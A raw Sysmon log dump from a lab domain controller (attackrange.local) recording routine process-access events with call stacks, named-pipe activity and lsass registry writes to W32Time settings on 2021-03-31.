12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000004140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x80000000000000004139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-ConnectPipe2021-03-31 12:02:10.392{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 17141700x80000000000000004138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:02:10.392{266CAFBE-646C-6064-0F00-00000000AE01}1116\TSVCPIPE-b7ec3ca2-9bd6-4c2b-86e9-54daa17e0583C:\Windows\System32\svchost.exe 10341000x80000000000000004137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.392{266CAFBE-646C-6064-0F00-00000000AE01}11161508C:\Windows\System32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6a73d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.392{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.377{266CAFBE-646C-6064-1000-00000000AE01}11241256C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.377{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.377{266CAFBE-646C-6064-1000-00000000AE01}11241256C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.314{266CAFBE-646C-6064-1500-00000000AE01}13162172C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:10.299{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000000) 13241300x80000000000000004114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:10.299{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00017366) 13241300x80000000000000004113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:10.299{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7261b-0xc686dfd5) 
